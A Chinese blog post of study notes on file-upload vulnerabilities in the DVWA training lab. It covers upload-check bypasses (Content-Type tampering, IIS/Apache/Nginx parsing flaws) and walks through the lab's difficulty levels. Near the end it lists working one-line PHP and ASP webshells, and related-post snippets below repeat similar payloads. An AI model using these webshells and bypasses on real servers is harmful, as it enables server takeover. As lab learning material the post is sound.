dvwa 上传漏洞

最新推荐文章于 2023-01-12 14:28:09 发布
最新推荐文章于 2023-01-12 14:28:09 发布
阅读量110 收藏
点赞数
分类专栏: dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51177088/article/details/115299869
版权

文件上传漏洞

理解:

通过上传带有危害的文件(某些脚本以拿到webshell )一般都会对文件有限制,但可以利用各种漏洞

防御机制

客户端(js代码

只要利用burpsuite抓包改包即可绕过,或禁用修改相关js代码

客户端只是为了防止用户输入错误,极容易被绕过,所以一般服务器端验证才是真正的验证

  • 文件扩展名验证
    黑名单为定义不允许上传的内容,较白名单更易绕过
    白名单为定义允许上传的内容,较黑名单会安全一点
    但两者皆可以利用容器解析漏洞绕过

MIME验证:

MIME用于设定某种扩展名文件的打开方式

同样可以利用burpsuite抓包改 Content-Type 来绕过

目录验证

?不懂

  1. 文件上传后会放入指定目录中,利用HTML代码中有一个隐藏标签
	<input type="hidden" name="" value="">//是文件上传的默认文件夹

我们利用firebug修改value=" .asp"即可建立畸形文件夹

  1. 利用非正常文件命名
    如 .aaspsp绕过验证

容器解析漏洞

如:

  1. llS解析漏洞:当建立 .asa .asp为后缀的文件夹时其目录下的任意文件都可以被当成asp文件来解析,这样我们就可以上传带有危险的代码被当作asp解析执行。
    当文件为 .asp;1.jpg 时,llS6.0同样会以ASP脚本执行
  2. Apeche解析漏洞:其解析文件顺序为从后往前,直到遇到认识的扩展名为止(如上传1.asp.rar rar不认识,则会解析asp脚本
  3. Nginx解析漏洞:若在上传的图片地址后加/ .php ,则改图片会被当成php解析(图片木马)
    4.windows:如果文件名以 . 或空格结尾,系统会自动去除空格

严格的上传:

1.对文件扩展名及MIME验证
2.对文件进行重命名
??? 3.对路径进行验证

做题:

简单的

在这里插入图片描述
可以发现,没有对文件进行验证,我们直接上传一段php代码
会返回地址,用 …/…/文件地址 即可访问到

. 中等难度

会限制文件格式,只要抓包改一下content-type即可

  • 将conten-type改为题目中要求的
    在这里插入图片描述
  • 放包即可发现文件成功上传
    在这里插入图片描述
  • 访问文件的相对位置
    在这里插入图片描述

高等级

需要和文件包含漏洞相结合,以及PHP伪协议(file
结果如下:
在这里插入图片描述

tip:

如Python、ASP、PHP、CGI、JSP等,都是脚本语言。

. 辅助工具:
burp suite

. 一句话木马:

	PHP:  <?php @eval($_POST['密码']);?>
		   <?fputs(fopen("shell.php","w"),'<?php @eval($_POST[zt]);?>')?>
		   
	ASP:  <%eval request("密码") %>
qq_51177088
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA之PHP文件上传漏洞(File Upload)
Mi1k7ea
01-22 1万+
文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。 首先保存一句话木马为1.php文件: 另外对于上传的文件,可在DVWA的服务器中(本人用的是Metasploitable虚拟机)以下路径找到: /var/www/dvwa/hackab
DVWA之文件上传漏洞
weixin_56306210的博客
02-13 3939
DVWA之文件上传
dvwa中的文件上传漏洞
无痕的博客
01-12 6591
dvwa漏洞环境演示文件上传漏洞
dvwa文件上传漏洞】--文件上传漏洞总结
m0_63241485的博客
08-30 3474
文件上传漏洞--dvwa
DVWA~文件上传漏洞
里丘~班诺的小屋
05-09 1138
靶机介绍 实验原理 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell 一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 SQL注入攻击的对象是数据库服务,文件上传漏洞
DVWA之File Upload (文件上传漏洞)
热门推荐
谢公子的博客
09-30 2万+
目录 Low: Medium: 方法一:抓包修改文件的type 方法二:00截断 High: Impossible : Low: 源代码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PA...
DVWA-master.zip
03-13
DVWA是一款渗透测试的演练系统,用于常规WEB漏洞教学和WEB脆弱性测试。包含了SQL注入、文件上传、XSS等一些常见的安全漏洞
计算机病毒与防护:文件上传漏洞利用MIME校验.ppt
06-10
* * * * * * * * * * * * 目录页 文件上传漏洞利用 MIME校验 文件上传漏洞---绕过MIME检测 1)上传一句话木马 eval.php 2)上传地址 36/DVWA/vulnerabilities/upload2 文件上传漏洞利用 文件上传漏洞---绕过MIME检测...
dvwa:dvwa教学版
03-07
DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞,这些漏洞具有不同的难度。 请注意,此软件同时存在已记录和未记录的漏洞。 这是故意的。 鼓励您尝试发现尽可能多的问题。警告! 该死的漏洞Web应用程序...
DVWA靶场-文件上传漏洞
zeroone的博客
03-08 1万+
第五关:File upload(文件上传)       文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 Low <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to
DVWA中的upload(文件上传漏洞
hwy2506451901的博客
04-03 478
原理: 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件。 准备:打开靶机后查看IP地址,在...
DVWA文件上传漏洞(medium)
cried_cat的博客
04-06 1884
DVWA文件上传漏洞2018/4/6        criedcat ***本文需要知道%00截断是怎么个一回事。整体上的思路无非就是上传一个隐藏的木马,然后用菜刀链接*** ****网络有文章说,%00截断出现在php5.3.4之前版本,但是我的测试环境是5.4.45,却依然可以用%00截断;笔者不知道是否和服务器有什么关系***** 首先介绍一下,dvwa是我们平常很熟悉的一个php漏洞集成平...
WTP Facet 之 AddFilter
yianpuodiaotu的专栏
06-11 104
做插件开发的人员都知道,如果你不晓得该使用那个Eclipse提供的api工具类,你做起来很痛苦。 今天做facet的时候,发现j2ee 和 jee 是有区别的,自己琢磨着把程序功能做了出来,费了好大劲。   今天偶尔看到这一个facet,顿时感慨,如果早看到它,也不用那么费神了。 /******************************************************...
DVWA-文件上传
Xiayuyuren_Study的博客
06-05 5964
概述 文件上传漏洞是指服务器对于用户上传的部分控制不严格导致攻击者可上传一个恶意的可执行文件至服务器,简单点就是用户直接或通过各种绕过方式将webshell上传至服务器进而执行利用 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 Apache的文件解析漏洞,比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,Apache有自己...
利用 DirectShow 开发自己的 Filter
12-20 1187
一、给vc配置DirectShow的开发环境  无论开发Filter还是开发Dshow的应用程序都要配置一下开发环境的,其实就是包含一下dshow用到的头文件和动态库。 选择Tools菜单下面的Options。在弹出的Option对话框配置如下:图1 添加头文件选择动态库文件添加到工程中图2 添加动态库二、创建工程以及Filter的入口函数创建工程:  一般情况下,创建Filter使用一个普通的W
Dvwa之文件上传漏洞
JBlock的博客
11-16 3971
今天到了比较有意思的地方,一句话我们要传木马啦!这个就比较有意思了,毕竟我们查找漏洞最想要的效果之一就是传马成功,获得我们想要的权限。 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 因为我用的web容器是Apache,所以暂且只介绍Apache的文件解析漏洞。 比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,A
Damn Vulnerable Web Application(DVWA)——文件上传漏洞
longanquan的博客
08-06 1103
文件上传漏洞简介 文件上传是web应用不可或缺的功能之一。如果服务器配置不当或者没有进行足够的过滤,web用户就可以上传任意文件,包括恶意脚本文件等,这就造成了文件上传漏洞。 环境简绍 Windows7模拟客户机(攻击者,有恶意代码文件,有菜刀工具) Window server 2008模拟服务器(搭建DVWA) LOW难度 在win7上访问DVWA 我们直接将做好的一句话木马进行上传 一句话木马为.php文件,文件内容为: <?php @eval($_POST['pass']);?> 然后
DVWA-文件上传漏洞 教程
weixin_44716769的博客
09-08 969
文件上传漏洞 实验准备 安装JDK环境 在系统变量下新建变量JAVA_HOME 变量值指向JDK安装的文件夹。 在系统变量下新建变量CLASSPATH 变量值输入: .;%JAVA_HOME%\lib;%JAVA_HOME%\lib\tools.jar;%JAVA_HOME%\lib\dt.jar 选中Path 点击编辑,Windows 7系统, 则直接在末尾添加 测试安装成功 Low等级 查看源码 basename(path,suffix) 函数返回路径中的文件名部分,如果可选参数suf
dvwa文件上传漏洞
最新发布
05-11
DVWA(Damn Vulnerable Web Application)是一个专门为测试人员和安全研究人员设计的漏洞练习平台。文件上传漏洞是指攻击者通过绕过网站的文件上传功能,将自己恶意构造的文件上传到服务器上,然后利用该文件达到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值